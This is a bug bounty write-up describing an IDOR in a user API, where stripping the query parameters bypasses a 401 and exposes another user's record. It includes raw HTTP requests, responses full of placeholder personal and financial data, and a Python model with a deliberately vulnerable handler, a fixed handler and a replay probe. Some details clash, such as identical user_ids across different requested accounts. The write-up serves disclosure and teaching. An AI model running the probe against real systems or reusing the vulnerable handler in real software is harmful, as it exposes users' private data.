
IDOR bypassed 401 leading to a leak of personal data


📌 Short Description

I found an Insecure Direct Object Reference (IDOR) in the endpoint GET /api/user/[id]. With the query parameters present, the server returned 401 Unauthorized when I requested another user's record. When the parameters were removed from the URL, the same endpoint returned 200 and exposed the other user's personal data without any authorization check. The 401 body (error="invalid_token") suggests that it was the token parameter, not the session, that was being rejected: on the cookie-authenticated path the server never checked that the logged-in user owns the requested id.

🔍 Reproduction Steps

  1. Log in as the ATTACKER (User A).

  2. While browsing the profile section I found the following request:

    GET /api/user/12345?token=abc123xyz&include=profile,contacts,settings HTTP/1.1
    Host: target-website.com
    Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.9
    Connection: keep-alive
    Referer: https://target-website.com/dashboard

    This request returns the ATTACKER's own personal data:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Cache-Control: no-store

    {
    "user_id": "1234567890",
    "username": "johndoe",
    "email": "johndoe@example.com",
    "password_hash": "$2b$12$EixZaYVK1fsbw1ZfbX3OXe.PxoEwFv0uQ1m07QzH2dq0WyP5fpGuK",
    "credit_card": { "number": "4111111111111111", "expiry": "12/25", "cvv": "123" },
    "social_security_number": "123-45-6789",
    "bank_account": { "account_number": "9876543210", "routing_number": "021000021" },
    "jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
    "two_factor_secret": "JBSWY3DPEHPK3PXP"
    }

  3. Here I changed the ATTACKER's ID 12345 to the VICTIM's ID 12346 to try to view the victim's personal data, and I could not get it → Response: 401 Unauthorized.

    HTTP/1.1 401 Unauthorized
    Content-Type: application/json
    WWW-Authenticate: Bearer realm="example", error="invalid_token", error_description="The access token is missing or invalid."

    { "error": "unauthorized", "message": "Authentication required or invalid credentials." }

  4. After that I removed all the parameters from the request line, like this:

    GET /api/user/12346 HTTP/1.1
    Host: target-website.com
    Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.9
    Connection: keep-alive
    Referer: https://target-website.com/dashboard

  5. And this bypassed the 401! The VICTIM's personal data appeared in the response:

    {
    "user_id": "1234567890",
    "username": "albert",
    "email": "ablert@example.com",
    "password_hash": "$2b$12$X5jVq3nySlDFG8WqQIwYQesJ2Rb6x9twQ4Q49gJLbYqRpItGmfP5C",
    "credit_card": { "number": "5111111111111113", "expiry": "10/28", "cvv": "124" },
    "social_security_number": "125-46-6889",
    "bank_account": { "account_number": "9276443211", "routing_number": "023000022" },
    "jwt_token": "eyJfhwefJHWHFWHjwgfhwjGEEJJRTRJWrjg...",
    "two_factor_secret": "JBSEIHWHFWEIOJWRTG"
    }
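To make the failure mode concrete, here is an added Python model of the two code paths. It is not code from the target or from this post: a handler that behaves the way the steps above describe (a `?token=` parameter bound to the id in the path, and a session-cookie fallback with no ownership check), a hardened handler that always compares the caller's identity with the requested id, and a probe that replays steps 2 to 4 against either handler. The user ids, the session cookie value, the token value and the `USERS`/`SESSIONS`/`API_TOKENS` stores are constructed placeholders.

```python
import json
from urllib.parse import urlparse, parse_qs

# Constructed placeholder records. The field set is deliberately trimmed:
# password hashes, card data and 2FA secrets never belong in an API response.
USERS = {
    "12345": {"user_id": "12345", "username": "johndoe", "email": "johndoe@example.com"},
    "12346": {"user_id": "12346", "username": "albert", "email": "albert@example.com"},
}
SESSIONS = {"attacker-session": "12345"}   # hypothetical session store: cookie -> user id
API_TOKENS = {"abc123xyz": "12345"}        # hypothetical token store: ?token= value -> owner


def _parse(request_line):
    """Split 'GET /api/user/12346?token=x HTTP/1.1' into (path user id, query dict)."""
    target = request_line.split()[1]
    url = urlparse(target)
    user_id = url.path.rstrip("/").rsplit("/", 1)[-1]
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    return user_id, params


def vulnerable_handler(request_line, cookies):
    """Models the behaviour the writeup describes.

    When ?token= is present it is checked against the id in the path, which is
    why step 3 gets a 401. When the query string is removed the handler falls
    back to the session cookie, which only proves that *some* user is logged
    in; the ownership check is never made.
    """
    user_id, params = _parse(request_line)
    if "token" in params:
        if API_TOKENS.get(params["token"]) != user_id:
            return 401, {"error": "unauthorized",
                         "message": "Authentication required or invalid credentials."}
        return 200, USERS[user_id]
    if cookies.get("session_id") not in SESSIONS:
        return 401, {"error": "unauthorized"}
    if user_id not in USERS:
        return 404, {"error": "not_found"}
    return 200, USERS[user_id]          # BUG: any logged-in user gets any record


def fixed_handler(request_line, cookies):
    """Hardened version: resolve the caller's identity first, then compare it
    with the object being requested. Every code path makes the comparison."""
    user_id, params = _parse(request_line)
    if "token" in params:
        caller = API_TOKENS.get(params["token"])
    else:
        caller = SESSIONS.get(cookies.get("session_id"))
    if caller is None:
        return 401, {"error": "unauthorized"}      # not authenticated at all
    if caller != user_id:
        return 403, {"error": "forbidden"}         # authenticated, but not the owner
    if user_id not in USERS:
        return 404, {"error": "not_found"}
    return 200, USERS[user_id]


def probe_idor(handler, attacker_cookie, attacker_id, victim_id, token):
    """Replay steps 2-4 of the writeup against a handler and report whether the
    parameter-less request (step 4) leaks the victim's record."""
    cookies = {"session_id": attacker_cookie}
    own = handler(f"GET /api/user/{attacker_id}?token={token}&include=profile HTTP/1.1", cookies)
    victim_with_params = handler(f"GET /api/user/{victim_id}?token={token}&include=profile HTTP/1.1", cookies)
    victim_bare = handler(f"GET /api/user/{victim_id} HTTP/1.1", cookies)
    leaked = victim_bare[0] == 200 and victim_bare[1].get("user_id") == victim_id
    return {
        "own": own[0],
        "victim_with_params": victim_with_params[0],
        "victim_bare": victim_bare[0],
        "leaked": leaked,
    }


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handler), ("fixed", fixed_handler)):
        result = probe_idor(handler, "attacker-session", "12345", "12346", "abc123xyz")
        print(name, json.dumps(result))
```

Against the vulnerable handler the probe reproduces the 200 / 401 / 200 sequence from the steps above, with `leaked` true; against the fixed handler the two victim requests both get 403, because the caller is authenticated but is not the owner (401 is the right answer only when there is no valid identity at all). The same probe, pointed at a real target, is how to confirm the fix: the bare request must stop returning the victim's record, not just the one with the token.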

    *Jeder Duplicate


BountyProofs | Bug Bounty Writeups & Free Tools
